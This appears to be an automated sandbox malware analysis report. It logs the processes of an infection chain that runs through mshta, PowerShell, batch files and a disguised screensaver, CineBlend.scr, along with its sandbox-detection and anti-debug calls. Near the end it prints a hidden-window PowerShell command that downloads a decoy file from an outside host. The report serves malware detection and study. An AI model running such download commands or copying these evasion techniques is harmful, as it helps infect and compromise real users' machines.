Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_36-104756

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2770	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2604	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3008	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6229
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3487

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	API coverage: 4.0 %
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	API coverage: 4.3 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep count: 2770 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188	Thread sleep count: 2604 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7272	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7500	Thread sleep count: 3008 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7516	Thread sleep count: 140 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7468	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8164	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8648	Thread sleep count: 6229 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8644	Thread sleep count: 3487 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8700	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 8952	Thread sleep count: 82 > 30
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com TID: 8720	Thread sleep time: -40000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_00406301 FindFirstFileW,FindClose,	15_2_00406301
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	15_2_00406CC7
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BAA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	36_2_00BAA087
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BAA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	36_2_00BAA1E2
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B9E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	36_2_00B9E472
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BAA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	36_2_00BAA570
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BA66DC FindFirstFileW,FindNextFileW,FindClose,	36_2_00BA66DC
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B6C622 FindFirstFileExW,	36_2_00B6C622
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BA73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	36_2_00BA73D4
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BA7333 FindFirstFileW,FindClose,	36_2_00BA7333
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B9D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	36_2_00B9D921
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B9DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	36_2_00B9DC54
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_0064A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_0064A087
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_0064A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_0064A1E2
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_0063E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	38_2_0063E472
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_0064A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	38_2_0064A570
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_0060C622 FindFirstFileExW,	38_2_0060C622
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_006466DC FindFirstFileW,FindNextFileW,FindClose,	38_2_006466DC
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_00647333 FindFirstFileW,FindClose,	38_2_00647333
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_006473D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	38_2_006473D4
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_0063D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_0063D921
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_0063DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_0063DC54

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00B35FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

36_2_00B35FC8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: mshta.exe, 00000000.00000002.1990413296.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984704836.000000000A3AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1990413296.000000000A3AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984704836.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000000.00000002.1989948457.000000000A3A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00BAF4FF BlockInput,

36_2_00BAF4FF

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00B3338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

36_2_00B3338B

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 15_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

15_2_00406328

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B55058 mov eax, dword ptr fs:[00000030h]		36_2_00B55058
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005F5058 mov eax, dword ptr fs:[00000030h]		38_2_005F5058

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00B920AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

36_2_00B920AA

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B62992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	36_2_00B62992
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B50BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	36_2_00B50BAF
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B50D45 SetUnhandledExceptionFilter,	36_2_00B50D45
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B50F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	36_2_00B50F91
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_00602992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_00602992
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005F0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_005F0BAF
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005F0D45 SetUnhandledExceptionFilter,	38_2_005F0D45
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005F0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	38_2_005F0F91

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

36_2_00B91B4D

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00B3338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

36_2_00B3338B

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00B9BBED SendInput,keybd_event,

36_2_00B9BBED

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 36_2_00B9EC9E mouse_event,

36_2_00B9EC9E

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"	Jump to behavior
